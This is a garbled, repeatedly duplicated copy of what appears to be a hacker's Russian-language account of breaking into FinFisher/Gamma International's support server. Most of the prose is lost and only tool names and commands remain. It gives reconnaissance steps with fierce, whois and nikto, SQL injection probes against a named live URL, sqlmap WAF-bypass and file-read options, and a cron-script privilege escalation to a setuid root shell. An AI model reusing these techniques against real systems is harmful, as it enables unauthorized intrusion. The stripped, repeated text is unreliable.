Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  1. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  2. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  3. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

